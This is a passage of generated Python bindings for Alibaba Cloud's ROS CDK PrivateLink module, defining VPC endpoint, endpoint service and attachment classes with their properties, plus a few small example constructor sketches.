return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceDescription"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceDomain")
def attr_service_domain(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceDomain: The domain name of the endpoint service.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceDomain"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceId: The ID of the endpoint service.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceName")
def attr_service_name(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceName: The name of the endpoint service.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="rosProperties")
def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="enableResourcePropertyConstraint")
def enable_resource_property_constraint(self) -> builtins.bool:
return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))
@enable_resource_property_constraint.setter
def enable_resource_property_constraint(self, value: builtins.bool) -> None:
jsii.set(self, "enableResourcePropertyConstraint", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="autoAcceptEnabled")
def auto_accept_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''
:Property:
autoAcceptEnabled: Specifies whether to automatically accept endpoint connection requests. Valid values:
true: automatically accepts endpoint connection requests.
false: does not automatically accept endpoint connection requests.
'''
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], jsii.get(self, "autoAcceptEnabled"))
@auto_accept_enabled.setter
def auto_accept_enabled(
self,
value: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "autoAcceptEnabled", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="connectBandwidth")
def connect_bandwidth(
self,
) -> typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]]:
'''
:Property: connectBandwidth: The default maximum bandwidth of the endpoint connection. Valid values: 100 to 1024. Unit: Mbit/s.
'''
return typing.cast(typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]], jsii.get(self, "connectBandwidth"))
@connect_bandwidth.setter
def connect_bandwidth(
self,
value: typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "connectBandwidth", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="payer")
def payer(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
payer: The payer of the endpoint service. Valid values:
Endpoint: the service consumer.
EndpointService: the service provider.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "payer"))
@payer.setter
def payer(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "payer", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="resource")
def resource(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpointService.ResourceProperty"]]]]:
'''
:Property: resource:
'''
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpointService.ResourceProperty"]]]], jsii.get(self, "resource"))
@resource.setter
def resource(
self,
value: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, "RosVpcEndpointService.ResourceProperty"]]]],
) -> None:
jsii.set(self, "resource", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="serviceDescription")
def service_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceDescription: The description for the endpoint service.
'''
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], jsii.get(self, "serviceDescription"))
@service_description.setter
def service_description(
self,
value: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "serviceDescription", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="user")
def user(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]]:
'''
        :Property: user: Account IDs added to the whitelist of the endpoint service.
'''
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]], jsii.get(self, "user"))
@user.setter
def user(
self,
value: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]],
) -> None:
jsii.set(self, "user", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="zoneAffinityEnabled")
def zone_affinity_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''
:Property:
zoneAffinityEnabled: Specifies whether to resolve domain names to IP addresses in the nearest zone.
true: yes.
        false (default): no.
'''
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], jsii.get(self, "zoneAffinityEnabled"))
@zone_affinity_enabled.setter
def zone_affinity_enabled(
self,
value: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]],
) -> None:
jsii.set(self, "zoneAffinityEnabled", value)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointService.ResourceProperty",
jsii_struct_bases=[],
name_mapping={
"resource_id": "resourceId",
"resource_type": "resourceType",
"zone_id": "zoneId",
},
)
class ResourceProperty:
def __init__(
self,
*,
resource_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
resource_type: typing.Union[builtins.str, ros_cdk_core.IResolvable],
zone_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
'''
:param resource_id:
:param resource_type:
:param zone_id:
'''
self._values: typing.Dict[str, typing.Any] = {
"resource_id": resource_id,
"resource_type": resource_type,
"zone_id": zone_id,
}
@builtins.property
def resource_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: resourceId: Service resources added to the endpoint service.
'''
result = self._values.get("resource_id")
assert result is not None, "Required property 'resource_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def resource_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property:
            resourceType: The type of the service resource. Set the value to slb (SLB instances that support PrivateLink and are deployed in a VPC).
            Note: Only Server Load Balancer (SLB) instances that support PrivateLink can serve as service resources for endpoint services.
'''
result = self._values.get("resource_type")
assert result is not None, "Required property 'resource_type' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def zone_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: zoneId: The zone to which the service resource belongs.
'''
result = self._values.get("zone_id")
assert result is not None, "Required property 'zone_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "ResourceProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
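# --- Illustrative sketch (not part of the generated bindings) ---
# Building a ResourceProperty entry for an endpoint service. Per the
# docstrings above, resource_type must be "slb"; the resource and zone IDs
# are hypothetical placeholders.
def _example_resource_property() -> "RosVpcEndpointService.ResourceProperty":
    return RosVpcEndpointService.ResourceProperty(
        resource_id="lb-hypothetical0001",  # an SLB instance that supports PrivateLink
        resource_type="slb",                # the only documented value
        zone_id="cn-hangzhou-h",            # zone of the service resource (example value)
    )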
class RosVpcEndpointServiceAttachment(
ros_cdk_core.RosResource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointServiceAttachment",
):
'''A ROS template type: ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "RosVpcEndpointServiceAttachmentProps",
enable_resource_property_constraint: builtins.bool,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param props: - resource properties.
:param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="ROS_RESOURCE_TYPE_NAME")
def ROS_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "ROS_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrResourceId")
def attr_resource_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ResourceId: The resource id.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrResourceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrResourceType")
def attr_resource_type(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ResourceType: The resource type.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrResourceType"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
'''
:Attribute: ServiceId: The endpoint service that is associated with the endpoint.
'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="rosProperties")
def _ros_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "rosProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="enableResourcePropertyConstraint")
def enable_resource_property_constraint(self) -> builtins.bool:
return typing.cast(builtins.bool, jsii.get(self, "enableResourcePropertyConstraint"))
@enable_resource_property_constraint.setter
def enable_resource_property_constraint(self, value: builtins.bool) -> None:
jsii.set(self, "enableResourcePropertyConstraint", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="resourceId")
def resource_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: resourceId: The resource id.
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "resourceId"))
@resource_id.setter
def resource_id(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "resourceId", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="resourceType")
def resource_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: resourceType: The resource type.
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "resourceType"))
@resource_type.setter
def resource_type(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "resourceType", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="serviceId")
def service_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: serviceId: The endpoint service that is associated with the endpoint.
'''
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], jsii.get(self, "serviceId"))
@service_id.setter
def service_id(
self,
value: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
jsii.set(self, "serviceId", value)
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointServiceAttachmentProps",
jsii_struct_bases=[],
name_mapping={
"resource_id": "resourceId",
"resource_type": "resourceType",
"service_id": "serviceId",
},
)
class RosVpcEndpointServiceAttachmentProps:
def __init__(
self,
*,
resource_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
resource_type: typing.Union[builtins.str, ros_cdk_core.IResolvable],
service_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
) -> None:
        '''Properties for defining an ``ALIYUN::PrivateLink::VpcEndpointServiceAttachment``.
:param resource_id:
:param resource_type:
:param service_id:
'''
self._values: typing.Dict[str, typing.Any] = {
"resource_id": resource_id,
"resource_type": resource_type,
"service_id": service_id,
}
@builtins.property
def resource_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: resourceId: The resource id.
'''
result = self._values.get("resource_id")
assert result is not None, "Required property 'resource_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def resource_type(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: resourceType: The resource type.
'''
result = self._values.get("resource_type")
assert result is not None, "Required property 'resource_type' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def service_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''
:Property: serviceId: The endpoint service that is associated with the endpoint.
'''
result = self._values.get("service_id")
assert result is not None, "Required property 'service_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RosVpcEndpointServiceAttachmentProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
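# --- Illustrative sketch (not part of the generated bindings) ---
# All three properties of RosVpcEndpointServiceAttachmentProps are required,
# so construction is a straight keyword call; IDs are hypothetical placeholders.
def _example_attachment_props() -> "RosVpcEndpointServiceAttachmentProps":
    return RosVpcEndpointServiceAttachmentProps(
        resource_id="lb-hypothetical0001",
        resource_type="slb",
        service_id="epsrv-hypothetical0001",
    )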
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.RosVpcEndpointServiceProps",
jsii_struct_bases=[],
name_mapping={
"auto_accept_enabled": "autoAcceptEnabled",
"connect_bandwidth": "connectBandwidth",
"payer": "payer",
"resource": "resource",
"service_description": "serviceDescription",
"user": "user",
"zone_affinity_enabled": "zoneAffinityEnabled",
},
)
class RosVpcEndpointServiceProps:
def __init__(
self,
*,
auto_accept_enabled: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
connect_bandwidth: typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]] = None,
payer: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
resource: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]] = None,
service_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
user: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]] = None,
zone_affinity_enabled: typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]] = None,
) -> None:
        '''Properties for defining an ``ALIYUN::PrivateLink::VpcEndpointService``.
:param auto_accept_enabled:
:param connect_bandwidth:
:param payer:
:param resource:
:param service_description:
:param user:
:param zone_affinity_enabled:
'''
self._values: typing.Dict[str, typing.Any] = {}
if auto_accept_enabled is not None:
self._values["auto_accept_enabled"] = auto_accept_enabled
if connect_bandwidth is not None:
self._values["connect_bandwidth"] = connect_bandwidth
if payer is not None:
self._values["payer"] = payer
if resource is not None:
self._values["resource"] = resource
if service_description is not None:
self._values["service_description"] = service_description
if user is not None:
self._values["user"] = user
if zone_affinity_enabled is not None:
self._values["zone_affinity_enabled"] = zone_affinity_enabled
@builtins.property
def auto_accept_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''
:Property:
autoAcceptEnabled: Specifies whether to automatically accept endpoint connection requests. Valid values:
true: automatically accepts endpoint connection requests.
false: does not automatically accept endpoint connection requests.
'''
result = self._values.get("auto_accept_enabled")
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], result)
@builtins.property
def connect_bandwidth(
self,
) -> typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]]:
'''
:Property: connectBandwidth: The default maximum bandwidth of the endpoint connection. Valid values: 100 to 1024. Unit: Mbit/s.
'''
result = self._values.get("connect_bandwidth")
return typing.cast(typing.Optional[typing.Union[jsii.Number, ros_cdk_core.IResolvable]], result)
@builtins.property
def payer(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property:
payer: The payer of the endpoint service. Valid values:
Endpoint: the service consumer.
EndpointService: the service provider.
'''
result = self._values.get("payer")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def resource(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]]:
'''
:Property: resource:
'''
result = self._values.get("resource")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpointService.ResourceProperty]]]], result)
@builtins.property
def service_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''
:Property: serviceDescription: The description for the endpoint service.
'''
result = self._values.get("service_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def user(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]]:
'''
        :Property: user: Account IDs added to the whitelist of the endpoint service.
'''
result = self._values.get("user")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]], result)
@builtins.property
def zone_affinity_enabled(
self,
) -> typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]]:
'''
:Property:
zoneAffinityEnabled: Specifies whether to resolve domain names to IP addresses in the nearest zone.
true: yes.
        false (default): no.
'''
result = self._values.get("zone_affinity_enabled")
return typing.cast(typing.Optional[typing.Union[builtins.bool, ros_cdk_core.IResolvable]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "RosVpcEndpointServiceProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
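# --- Illustrative sketch (not part of the generated bindings) ---
# Every property of RosVpcEndpointServiceProps is optional, so
# RosVpcEndpointServiceProps() alone is valid; the populated variant below
# uses values taken from the documented ranges.
def _example_ros_vpc_endpoint_service_props() -> "RosVpcEndpointServiceProps":
    return RosVpcEndpointServiceProps(
        auto_accept_enabled=True,  # accept endpoint connection requests automatically
        connect_bandwidth=1024,    # Mbit/s, within the documented 100-1024 range
        payer="Endpoint",          # the service consumer pays
    )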
class VpcEndpoint(
ros_cdk_core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpoint",
):
'''A ROS resource type: ``ALIYUN::PrivateLink::VpcEndpoint``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: "VpcEndpointProps",
enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpoint``.
        :param scope: - scope in which this resource is defined.
        :param id: - scoped id of the resource.
        :param props: - resource properties.
        :param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrBandwidth")
def attr_bandwidth(self) -> ros_cdk_core.IResolvable:
'''Attribute Bandwidth: The bandwidth of the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointDomain")
def attr_endpoint_domain(self) -> ros_cdk_core.IResolvable:
'''Attribute EndpointDomain: The domain name of the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointDomain"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointId")
def attr_endpoint_id(self) -> ros_cdk_core.IResolvable:
'''Attribute EndpointId: The ID of the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrEndpointName")
def attr_endpoint_name(self) -> ros_cdk_core.IResolvable:
'''Attribute EndpointName: The name of the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrEndpointName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceId")
def attr_service_id(self) -> ros_cdk_core.IResolvable:
        '''Attribute ServiceId: The ID of the endpoint service that is associated with the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceName")
def attr_service_name(self) -> ros_cdk_core.IResolvable:
        '''Attribute ServiceName: The name of the endpoint service that is associated with the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrServiceName"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrVpcId")
def attr_vpc_id(self) -> ros_cdk_core.IResolvable:
        '''Attribute VpcId: The VPC ID of the endpoint.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrVpcId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrZoneDomains")
def attr_zone_domains(self) -> ros_cdk_core.IResolvable:
'''Attribute ZoneDomains: The zone domains.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrZoneDomains"))
@jsii.data_type(
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpointProps",
jsii_struct_bases=[],
name_mapping={
"security_group_id": "securityGroupId",
"vpc_id": "vpcId",
"endpoint_description": "endpointDescription",
"endpoint_name": "endpointName",
"service_id": "serviceId",
"service_name": "serviceName",
"zone": "zone",
},
)
class VpcEndpointProps:
def __init__(
self,
*,
security_group_id: typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[builtins.str, ros_cdk_core.IResolvable]]],
vpc_id: typing.Union[builtins.str, ros_cdk_core.IResolvable],
endpoint_description: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
endpoint_name: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
service_id: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
service_name: typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]] = None,
zone: typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.Sequence[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]] = None,
) -> None:
        '''Properties for defining an ``ALIYUN::PrivateLink::VpcEndpoint``.
:param security_group_id: Property securityGroupId: The security group associated with the endpoint network interface. The security group can control the data communication from the VPC to the endpoint network interface.
:param vpc_id: Property vpcId: The VPC to which the endpoint belongs.
:param endpoint_description: Property endpointDescription: The description of the endpoint. The description must be 2 to 256 characters in length and cannot start with http:// or https://.
:param endpoint_name: Property endpointName: The name of the endpoint. The name must be 2 to 128 characters in length and can contain digits, underscores (_), and hyphens (-). The name must start with a letter.
:param service_id: Property serviceId: The endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
:param service_name: Property serviceName: The name of the endpoint service that is associated with the endpoint. One of ServiceId and ServiceName is required.
:param zone: Property zone:.
'''
self._values: typing.Dict[str, typing.Any] = {
"security_group_id": security_group_id,
"vpc_id": vpc_id,
}
if endpoint_description is not None:
self._values["endpoint_description"] = endpoint_description
if endpoint_name is not None:
self._values["endpoint_name"] = endpoint_name
if service_id is not None:
self._values["service_id"] = service_id
if service_name is not None:
self._values["service_name"] = service_name
if zone is not None:
self._values["zone"] = zone
@builtins.property
def security_group_id(
self,
) -> typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]]:
'''Property securityGroupId: The security group associated with the endpoint network interface.
The security group can control the data communication from the VPC to the endpoint network interface.
'''
result = self._values.get("security_group_id")
assert result is not None, "Required property 'security_group_id' is missing"
return typing.cast(typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[builtins.str, ros_cdk_core.IResolvable]]], result)
@builtins.property
def vpc_id(self) -> typing.Union[builtins.str, ros_cdk_core.IResolvable]:
'''Property vpcId: The VPC to which the endpoint belongs.'''
result = self._values.get("vpc_id")
assert result is not None, "Required property 'vpc_id' is missing"
return typing.cast(typing.Union[builtins.str, ros_cdk_core.IResolvable], result)
@builtins.property
def endpoint_description(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property endpointDescription: The description of the endpoint.
The description must be 2 to 256 characters in length and cannot start with http:// or https://.
'''
result = self._values.get("endpoint_description")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def endpoint_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property endpointName: The name of the endpoint.
The name must be 2 to 128 characters in length and can contain digits, underscores
(_), and hyphens (-). The name must start with a letter.
'''
result = self._values.get("endpoint_name")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def service_id(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property serviceId: The endpoint service that is associated with the endpoint.
One of ServiceId and ServiceName is required.
'''
result = self._values.get("service_id")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def service_name(
self,
) -> typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]]:
'''Property serviceName: The name of the endpoint service that is associated with the endpoint.
One of ServiceId and ServiceName is required.
'''
result = self._values.get("service_name")
return typing.cast(typing.Optional[typing.Union[builtins.str, ros_cdk_core.IResolvable]], result)
@builtins.property
def zone(
self,
) -> typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]]:
'''Property zone:.'''
result = self._values.get("zone")
return typing.cast(typing.Optional[typing.Union[ros_cdk_core.IResolvable, typing.List[typing.Union[ros_cdk_core.IResolvable, RosVpcEndpoint.ZoneProperty]]]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "VpcEndpointProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
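# --- Illustrative sketch (not part of the generated bindings) ---
# Creating a VpcEndpoint resource. `scope` is assumed to be an existing
# ros_cdk_core.Construct (for example a Stack) defined elsewhere; all IDs
# and the service name are hypothetical placeholders.
def _example_vpc_endpoint(scope: ros_cdk_core.Construct) -> "VpcEndpoint":
    return VpcEndpoint(
        scope,
        "MyVpcEndpoint",
        VpcEndpointProps(
            security_group_id=["sg-hypothetical0001"],
            vpc_id="vpc-hypothetical0001",
            service_name="com.example.hypothetical-service",
        ),
    )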
class VpcEndpointService(
ros_cdk_core.Resource,
metaclass=jsii.JSIIMeta,
jsii_type="@alicloud/ros-cdk-privatelink.VpcEndpointService",
):
'''A ROS resource type: ``ALIYUN::PrivateLink::VpcEndpointService``.'''
def __init__(
self,
scope: ros_cdk_core.Construct,
id: builtins.str,
props: typing.Optional["VpcEndpointServiceProps"] = None,
enable_resource_property_constraint: typing.Optional[builtins.bool] = None,
) -> None:
'''Create a new ``ALIYUN::PrivateLink::VpcEndpointService``.
        :param scope: - scope in which this resource is defined.
        :param id: - scoped id of the resource.
        :param props: - resource properties.
        :param enable_resource_property_constraint: -
'''
jsii.create(self.__class__, self, [scope, id, props, enable_resource_property_constraint])
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrMaxBandwidth")
def attr_max_bandwidth(self) -> ros_cdk_core.IResolvable:
'''Attribute MaxBandwidth: The maximum bandwidth of the endpoint connection.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrMaxBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrMinBandwidth")
def attr_min_bandwidth(self) -> ros_cdk_core.IResolvable:
'''Attribute MinBandwidth: The minimum bandwidth of the endpoint connection.'''
return typing.cast(ros_cdk_core.IResolvable, jsii.get(self, "attrMinBandwidth"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrServiceDescription")
def attr_service_description(self) -> ros_cdk_core.IResolvable:
